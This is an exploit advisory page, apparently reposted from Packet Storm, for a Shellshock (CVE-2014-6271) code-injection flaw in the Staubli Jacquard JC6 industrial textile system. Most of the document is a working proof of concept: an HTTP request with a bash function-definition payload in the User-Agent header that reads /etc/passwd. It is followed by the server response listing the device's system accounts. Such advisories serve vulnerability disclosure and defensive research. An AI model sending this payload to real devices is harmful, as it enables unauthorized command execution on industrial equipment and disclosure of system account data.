Staubli Jacquard Industrial System JC6 Shellshock

Staubli Jacquard Industrial System JC6 suffers from a bash environment variable handling code injection vulnerability.


MD5 | ab496b513ca8eb64b58bc9279627e7c5

Download
# Exploit Title: Staubli Jacquard Industrial System | GNU Bash Environment
Variable Handling Code Injection (Shellshock)
# Date: 21.09.2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.staubli.com
# Software Link:
https://www.staubli.com/tr-tr/textile/textile-machinery-solutions/
# Version:JC6
# CVE: CVE-2014-6271
# Tested on: Linux

----------------------------#PoC#----------------------------

--------------> Request

GET / HTTP/1.1 Host: TargetIP User-Agent: () { test;};echo \"Content-type:
text/plain\"; echo; echo; echo $(</etc/passwd) Pragma: no-cache Accept:
image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*

--------------> Response

<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html;charset=utf8">
    <link href="/staubli.css" rel="stylesheet" type="text/css">
    <title>root:!:0:0::/:/usr/bin/ksh daemon:!:1:1::/etc: bin:!:2:2::/bin:
sys:!:3:3::/usr/sys: adm:!:4:4::/var/adm: uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest: nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/: lp:*:11:11::/var/spool/lp:/bin/false
invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh nuucp:*:6:5:uucp login
user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
paul:!:201:1::/home/paul:/usr/bin/ksh jdoe:*:202:1:John
Doe:/home/jdoe:/usr/bin/ksh</title>
  </head>
    <frameset rows="10%,90%" border=0>
      <frameset cols="25%,75%" border=0>
        <frame src="logo.html" name="logo" scrolling="no">
        <frame src="/cgi-bin/title.cgi" name="title">
      </frameset>
      <frameset cols="25%,75%" border=0>
        <frame src="menu_main.shtml" name="menu">
        <frame src="main.shtml" name="main">
      </frameset>
    </frameset>
  <noframe>
  <body id="main">
  Sorry your navigator doesn't accept frame.
  </body>
  </noframe>
</html>

Source: packetstormsecurity.com
Related Posts